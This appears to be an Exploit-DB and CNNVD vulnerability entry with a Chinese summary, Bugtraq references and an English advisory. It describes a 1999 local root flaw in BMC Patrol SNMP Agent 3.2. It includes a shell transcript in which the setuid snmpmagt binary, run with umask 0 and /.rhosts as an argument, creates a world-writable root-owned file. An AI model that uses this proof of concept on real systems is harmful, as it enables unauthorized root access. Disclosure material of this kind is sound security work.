https://www.exploit-db.com/exploits/19422
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199907-015

BMCPATROLSNMPAgent3.2.07之前的版本存在漏洞。本地用户可以通过指定目标文件作为snmpmagt程序的第二参数，来将任意全域可写文件创建为根。

source: http://www.securityfocus.com/bid/525/info


Patrol 3.2, installed out of the box, allows for a local root compromise or denial of service. The vulnerability lies in the creation of a file by snmpagnt that is owned by the owner of the parent directory of the file and possibly world writeable. A local user can specify any file (/.rhosts) and create it / set the permissions according to the user's umask.

maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al snmpmagt
-rwsr-xr-x 1 root users 185461 Mar 6 1998 snmpmagt*

maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al /.rhosts
/.rhosts not found

maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> umask 0

maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> snmpmagt yoyoyo /.rhosts

yoyoyo: No such file or directory
snmp bind failure: Address already in use
/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin/snmpmagt: error processing configuration

maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al /.rhosts
-rw-rw-rw- 1 root users 770 Jul 13 14:42 .rhosts

note: If the file exists, it keeps the same perms and overwrites it
with "i^A" then the result of gethostname() and some whitespace. this
problem is not platform dependent and was tested based on out of box
install on an HP.

来源:BID
名称:525
链接:http://www.securityfocus.com/bid/525
来源:BUGTRAQ
名称:19990713RootPermsGainedwithPatrolSNMPAgent3.2(allothers?)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=93198293132463&w;=2
来源:BUGTRAQ
名称:19990801Re:RootPermsGainedwithPatrolSNMPAgent3.2(allothers?)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=93372579004129&w;=2